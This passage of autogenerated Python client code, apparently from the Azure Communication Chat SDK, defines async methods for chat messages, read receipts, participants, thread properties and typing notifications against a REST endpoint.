accept, 'str') if not next_link: # Construct URL url = self.list_chat_read_receipts.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if max_page_size is not None: query_parameters['maxPageSize'] = self._serialize.query("max_page_size", max_page_size, 'int') if skip is not None: query_parameters['skip'] = self._serialize.query("skip", skip, 'int') query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('ChatMessageReadReceiptsCollection', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_chat_read_receipts.metadata = {'url': '/chat/threads/{chatThreadId}/readReceipts'} # type: ignore async def send_chat_read_receipt( self, chat_thread_id: str, send_read_receipt_request: "_models.SendReadReceiptRequest", **kwargs: Any ) -> None: """Sends a read receipt event to a thread, on behalf of a user. Sends a read receipt event to a thread, on behalf of a user. :param chat_thread_id: Thread id to send the read receipt event to. :type chat_thread_id: str :param send_read_receipt_request: Read receipt details. :type send_read_receipt_request: ~azure.communication.chat.models.SendReadReceiptRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.send_chat_read_receipt.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(send_read_receipt_request, 'SendReadReceiptRequest') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) send_chat_read_receipt.metadata = {'url': '/chat/threads/{chatThreadId}/readReceipts'} # type: ignore async def send_chat_message( self, chat_thread_id: str, send_chat_message_request: "_models.SendChatMessageRequest", **kwargs: Any ) -> "_models.SendChatMessageResult": """Sends a message to a thread. Sends a message to a thread. :param chat_thread_id: The thread id to send the message to. :type chat_thread_id: str :param send_chat_message_request: Details of the message to send. :type send_chat_message_request: ~azure.communication.chat.models.SendChatMessageRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: SendChatMessageResult, or the result of cls(response) :rtype: ~azure.communication.chat.models.SendChatMessageResult :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.SendChatMessageResult"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.send_chat_message.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(send_chat_message_request, 'SendChatMessageRequest') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [201]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) deserialized = self._deserialize('SendChatMessageResult', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized send_chat_message.metadata = {'url': '/chat/threads/{chatThreadId}/messages'} # type: ignore def list_chat_messages( self, chat_thread_id: str, max_page_size: Optional[int] = None, start_time: Optional[datetime.datetime] = None, **kwargs: Any ) -> AsyncIterable["_models.ChatMessagesCollection"]: """Gets a list of messages from a thread. Gets a list of messages from a thread. :param chat_thread_id: The thread id of the message. :type chat_thread_id: str :param max_page_size: The maximum number of messages to be returned per page. :type max_page_size: int :param start_time: The earliest point in time to get messages up to. The timestamp should be in RFC3339 format: ``yyyy-MM-ddTHH:mm:ssZ``. :type start_time: ~datetime.datetime :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either ChatMessagesCollection or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.communication.chat.models.ChatMessagesCollection] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.ChatMessagesCollection"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_chat_messages.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if max_page_size is not None: query_parameters['maxPageSize'] = self._serialize.query("max_page_size", max_page_size, 'int') if start_time is not None: query_parameters['startTime'] = self._serialize.query("start_time", start_time, 'iso-8601') query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('ChatMessagesCollection', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_chat_messages.metadata = {'url': '/chat/threads/{chatThreadId}/messages'} # type: ignore async def get_chat_message( self, chat_thread_id: str, chat_message_id: str, **kwargs: Any ) -> "_models.ChatMessage": """Gets a message by id. Gets a message by id. :param chat_thread_id: The thread id to which the message was sent. :type chat_thread_id: str :param chat_message_id: The message id. :type chat_message_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: ChatMessage, or the result of cls(response) :rtype: ~azure.communication.chat.models.ChatMessage :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.ChatMessage"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" # Construct URL url = self.get_chat_message.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), 'chatMessageId': self._serialize.url("chat_message_id", chat_message_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.get(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) deserialized = self._deserialize('ChatMessage', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_chat_message.metadata = {'url': '/chat/threads/{chatThreadId}/messages/{chatMessageId}'} # type: ignore async def update_chat_message( self, chat_thread_id: str, chat_message_id: str, update_chat_message_request: "_models.UpdateChatMessageRequest", **kwargs: Any ) -> None: """Updates a message. Updates a message. :param chat_thread_id: The thread id to which the message was sent. :type chat_thread_id: str :param chat_message_id: The message id. :type chat_message_id: str :param update_chat_message_request: Details of the request to update the message. :type update_chat_message_request: ~azure.communication.chat.models.UpdateChatMessageRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/merge-patch+json") accept = "application/json" # Construct URL url = self.update_chat_message.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), 'chatMessageId': self._serialize.url("chat_message_id", chat_message_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(update_chat_message_request, 'UpdateChatMessageRequest') body_content_kwargs['content'] = body_content request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) update_chat_message.metadata = {'url': '/chat/threads/{chatThreadId}/messages/{chatMessageId}'} # type: ignore async def delete_chat_message( self, chat_thread_id: str, chat_message_id: str, **kwargs: Any ) -> None: """Deletes a message. Deletes a message. :param chat_thread_id: The thread id to which the message was sent. :type chat_thread_id: str :param chat_message_id: The message id. :type chat_message_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" # Construct URL url = self.delete_chat_message.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), 'chatMessageId': self._serialize.url("chat_message_id", chat_message_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.delete(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) delete_chat_message.metadata = {'url': '/chat/threads/{chatThreadId}/messages/{chatMessageId}'} # type: ignore def list_chat_participants( self, chat_thread_id: str, max_page_size: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any ) -> AsyncIterable["_models.ChatParticipantsCollection"]: """Gets the participants of a thread. Gets the participants of a thread. :param chat_thread_id: Thread id to get participants for. :type chat_thread_id: str :param max_page_size: The maximum number of participants to be returned per page. :type max_page_size: int :param skip: Skips participants up to a specified position in response. :type skip: int :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either ChatParticipantsCollection or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.communication.chat.models.ChatParticipantsCollection] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.ChatParticipantsCollection"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_chat_participants.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] if max_page_size is not None: query_parameters['maxPageSize'] = self._serialize.query("max_page_size", max_page_size, 'int') if skip is not None: query_parameters['skip'] = self._serialize.query("skip", skip, 'int') query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) request = self._client.get(url, query_parameters, header_parameters) return request async def extract_data(pipeline_response): deserialized = self._deserialize('ChatParticipantsCollection', pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_chat_participants.metadata = {'url': '/chat/threads/{chatThreadId}/participants'} # type: ignore async def remove_chat_participant( self, chat_thread_id: str, participant_communication_identifier: "_models.CommunicationIdentifierModel", **kwargs: Any ) -> None: """Remove a participant from a thread. Remove a participant from a thread. :param chat_thread_id: Thread id to remove the participant from. :type chat_thread_id: str :param participant_communication_identifier: Id of the thread participant to remove from the thread. :type participant_communication_identifier: ~azure.communication.chat.models.CommunicationIdentifierModel :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.remove_chat_participant.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(participant_communication_identifier, 'CommunicationIdentifierModel') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) remove_chat_participant.metadata = {'url': '/chat/threads/{chatThreadId}/participants/:remove'} # type: ignore async def add_chat_participants( self, chat_thread_id: str, add_chat_participants_request: "_models.AddChatParticipantsRequest", **kwargs: Any ) -> "_models.AddChatParticipantsResult": """Adds thread participants to a thread. If participants already exist, no change occurs. Adds thread participants to a thread. If participants already exist, no change occurs. :param chat_thread_id: Id of the thread to add participants to. :type chat_thread_id: str :param add_chat_participants_request: Thread participants to be added to the thread. :type add_chat_participants_request: ~azure.communication.chat.models.AddChatParticipantsRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: AddChatParticipantsResult, or the result of cls(response) :rtype: ~azure.communication.chat.models.AddChatParticipantsResult :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.AddChatParticipantsResult"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.add_chat_participants.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(add_chat_participants_request, 'AddChatParticipantsRequest') body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [201]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) deserialized = self._deserialize('AddChatParticipantsResult', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized add_chat_participants.metadata = {'url': '/chat/threads/{chatThreadId}/participants/:add'} # type: ignore async def update_chat_thread_properties( self, chat_thread_id: str, update_chat_thread_request: "_models.UpdateChatThreadRequest", **kwargs: Any ) -> None: """Updates a thread's properties. Updates a thread's properties. :param chat_thread_id: The id of the thread to update. :type chat_thread_id: str :param update_chat_thread_request: Request payload for updating a chat thread. :type update_chat_thread_request: ~azure.communication.chat.models.UpdateChatThreadRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/merge-patch+json") accept = "application/json" # Construct URL url = self.update_chat_thread_properties.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] body_content = self._serialize.body(update_chat_thread_request, 'UpdateChatThreadRequest') body_content_kwargs['content'] = body_content request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) update_chat_thread_properties.metadata = {'url': '/chat/threads/{chatThreadId}'} # type: ignore async def get_chat_thread_properties( self, chat_thread_id: str, **kwargs: Any ) -> "_models.ChatThreadProperties": """Gets a chat thread's properties. Gets a chat thread's properties. :param chat_thread_id: Id of the thread. :type chat_thread_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: ChatThreadProperties, or the result of cls(response) :rtype: ~azure.communication.chat.models.ChatThreadProperties :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.ChatThreadProperties"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" # Construct URL url = self.get_chat_thread_properties.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') request = self._client.get(url, query_parameters, header_parameters) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) deserialized = self._deserialize('ChatThreadProperties', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_chat_thread_properties.metadata = {'url': '/chat/threads/{chatThreadId}'} # type: ignore async def send_typing_notification( self, chat_thread_id: str, send_typing_notification_request: Optional["_models.SendTypingNotificationRequest"] = None, **kwargs: Any ) -> None: """Posts a typing event to a thread, on behalf of a user. Posts a typing event to a thread, on behalf of a user. :param chat_thread_id: Id of the thread. :type chat_thread_id: str :param send_typing_notification_request: Details of the typing notification request. :type send_typing_notification_request: ~azure.communication.chat.models.SendTypingNotificationRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: None, or the result of cls(response) :rtype: None :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType[None] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" content_type = kwargs.pop("content_type", "application/json") accept = "application/json" # Construct URL url = self.send_typing_notification.metadata['url'] # type: ignore path_format_arguments = { 'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True), 'chatThreadId': self._serialize.url("chat_thread_id", chat_thread_id, 'str'), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str') header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') body_content_kwargs = {} # type: Dict[str, Any] if send_typing_notification_request is not None: body_content = self._serialize.body(send_typing_notification_request, 'SendTypingNotificationRequest') else: body_content = None body_content_kwargs['content'] = body_content request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, 